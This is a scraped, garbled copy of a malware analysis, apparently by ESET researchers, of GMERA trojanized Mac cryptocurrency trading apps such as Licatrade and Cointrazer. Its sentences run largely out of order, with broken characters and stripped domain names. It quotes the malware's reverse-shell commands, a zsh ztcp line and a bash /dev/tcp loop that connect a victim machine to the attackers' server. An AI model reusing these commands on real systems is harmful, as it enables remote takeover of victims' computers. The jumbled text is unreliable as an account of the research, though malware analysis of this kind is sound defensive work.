![]() Website distributing the malicious Cupatrade appĬ&C server for HTTP report of Licatrade app Website distributing the malicious Cointrazer appĬ&C server for HTTP report of Cointrazer app ![]() Website distributing the malicious Trezarus app Website distributing the malicious Latinum app Website distributing the malicious Stockfolio app Domain nameĬ&C server for HTTP report of Stockfolio app Here is a list of domains we found in samples or registered with that email address. Searching for other domains registered with that email address reveals what looks like several previous campaigns. Both domains were registered using the email address. The malicious Licatrade application was available on the website and its C&C HTTP report server domain is. This, and the fact that we didn’t find anything else signed with the same key, suggests they got the certificate explicitly for that purpose. It’s interesting to note that in the case of Cointrazer, there were only 15 minutes between the moment the certificate was issued by Apple and the malefactors signing their trojanized application. See the IoCs section for details about these. Both were already revoked by Apple when we started our analyses. Licatrade certificate was revoked May 28th, 2020įor each of the other campaigns we analyzed, a different certificate was used. We have checked all changes between the original Kattana application and the malicious Licatrade copycat and found that only strings and images were changed.įigure 7. Kattana is built with Electron, and Electron apps have an app.asar file, which is an archive containing the JavaScript code of the application. Since Kattana asks for credentials for trading platforms to perform trading, we verified if the input fields of these were tampered with and if credentials were exfiltrated in some way. We wanted to see if, besides the change in name and icon in the application, some other code was changed. The rebranded Kattana application is also in the resources of the application bundle. Zsh -c ‘zmodload zsh/net/tcp & ztcp 17 25734 & zsh >&$REPLY 2>&$REPLY 0>&$REPLY’ Here are some example command lines used: Here is a list of ports, based on the Licatrade sample. The various reverse shells used by these malware operators connect to different remote ports depending on how they were started. The Cointrazer sample, used in campaigns prior to Licatrade, does not suffer from this issue: the Launch Agent is installed and successfully starts when the user logs in. Fortunately for the attackers, the last line of the shell script also starts a reverse shell to their server. If run directly, this code would open a reverse shell from the victim machine to an attacker-controlled server, but that fails here. We couldn’t confirm that it was linked to this particular campaign, but it could very well be the case.Įcho 'sdvkmsdfmsd…kxweivneivne' while : do sleep 10000 screen - X quit lsof - ti : 25733 | xargs kill - 9 screen - d - m bash - c 'bash -i >/dev/tcp/17/25733 0>&1' done echo 'sdvkmsdfmsdfms…nicvmdskxweivneivne' However, in March 2020, Kattana posted a warning suggesting that victims were approached individually to lure them into downloading a trojanized app. We have not yet been able to find exactly where these trojanized applications are promoted. In addition to the analysis of the malware code, ESET researchers have also set up honeypots to try to reveal the motivations behind this group of criminals. We have seen the following fictitious brandings used in different campaigns: Cointrazer, Cupatrade, Licatrade and Trezarus. This time, however, not only did the malware authors wrap the original, legitimate application to include malware they also rebranded the Kattana trading application with new names and copied its original website. As in the previous campaigns, the malware reports to a C&C server over HTTP and connects remote terminal sessions to another C&C server using a hardcoded IP address. Analyzing the malware samples, we quickly found that this was a new campaign of what Trend Micro researchers called GMERA, in an analysis they published in September 2019. This malware is used to steal information such as browser cookies, cryptocurrency wallets and screen captures. We’ve recently discovered websites distributing malicious cryptocurrency trading applications for Mac. ![]() ESET researchers lure GMERA malware operators to remotely control their Mac honeypots ![]()
0 Comments
Leave a Reply. |